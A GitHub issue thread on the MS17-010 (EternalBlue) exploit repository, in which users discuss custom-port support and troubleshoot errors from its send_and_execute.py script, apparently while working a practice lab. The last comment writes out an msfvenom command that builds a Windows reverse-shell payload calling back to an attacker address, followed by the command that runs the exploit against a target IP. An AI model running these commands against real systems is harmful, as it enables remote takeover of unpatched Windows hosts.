MS17-010 icon indicating copy to clipboard operation
MS17-010 copied to clipboard

Published 20 hours ago verified publisher icon worawit

Adding suport to custom tcp port

Open helviojunior opened this issue 6 years ago • 3 comments

I added support to custom TCP port, it is very usefull in case of port fowarding and pivoting.

My Best Regards.

helviojunior avatar Aug 07 '18 22:08 helviojunior

I added a new file, based on zzz_exploit.py to send and execute an windows executable file

using zzz_exploit.py, victim >> pwned.txt created successfully but using send_and_execute execution.py Starting service mTfl..... SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion. Removing service mTfl..... Done

tlmyasirs avatar Nov 15 '18 08:11 tlmyasirs

I added a new file, based on zzz_exploit.py to send and execute an windows executable file

using zzz_exploit.py, victim >> pwned.txt created successfully but using send_and_execute execution.py Starting service mTfl..... SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion. Removing service mTfl..... Done

Same error, has anyone solved it?

oriolmiranda avatar Dec 13 '23 09:12 oriolmiranda

Hey,

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.30 LPORT=8888 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.16.30_8888.exe

python send_and_execute.py 10.129.235.221 rev_10.10.16.30_8888.exe

Trying to connect to 10.129.235.221:445 Target OS: Windows 5.1 Using named pipe: browser Groom packets Traceback (most recent call last): File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 1077, in exploit(target, port, pipe_name) File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 839, in exploit if not info['method'](conn, pipe_name, info): File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 615, in exploit_fish_barrel conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0) File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 262, in send_trans self.send_raw(self.create_trans_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad)) File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 258, in create_trans_packet _put_trans_data(transCmd, param, data, noPad) File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 73, in _put_trans_data transData = ('\x00' * padLen) + parameters TypeError: can only concatenate str (not "bytes") to str

How can I fix this?

purplebyteone avatar Jun 12 '24 01:06 purplebyteone